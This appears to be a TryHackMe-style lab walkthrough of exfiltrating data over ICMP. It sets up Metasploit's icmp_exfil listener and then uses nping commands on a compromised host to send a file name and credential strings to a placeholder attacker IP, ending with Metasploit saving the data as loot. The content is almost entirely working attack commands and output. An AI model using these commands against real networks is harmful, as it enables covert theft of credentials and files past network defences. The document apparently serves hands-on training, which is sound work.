Data exfiltration over ICMP

Using Metasploit auxiliary/server/icmp_exfil:

# msfconsole
msf6 > use auxiliary/server/icmp_exfil
msf6 auxiliary(server/icmp_exfil) > options

Module options (auxiliary/server/icmp_exfil):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BPF_FILTER       icmp             yes       BFP format filter to listen for
   END_TRIGGER      ^EOF             yes       Trigger for end of file
   FNAME_IN_PACKET  true             yes       Filename presented in first pac
                                               ket straight after START_TRIGGE
   INTERFACE                         no        The name of the interface
   RESP_CONT        OK               yes       Data ro resond when continuatio
                                               n of data expected
   RESP_END         COMPLETE         yes       Data to response when EOF recei
                                               ved and data saved
   RESP_START       SEND             yes       Data to respond when initial tr
                                               igger matches
   START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Set options:

msf6 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src <IP attack machine>
BPF_FILTER => icmp and not src <IP attack machine>
msf6 auxiliary(server/icmp_exfil) > set INTERFACE tun0

In another terminal, go into the icmp box and start the transmission:

thm@jump-box$ ssh
thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "BOFfile.txt"

Send the data:

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "admin:password"

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "admin2:password2"

End the transmission:

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "EOF"


msf6 auxiliary(server/icmp_exfil) > run
[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
[+] Beginning capture of "file.txt" data
[*] 30 bytes of data received in total
[+] End of File received. Saving "file.txt" to loot
[+] Incoming file "file.txt" saved to loot
[+] Loot filename: /path/to/loot/filename.txt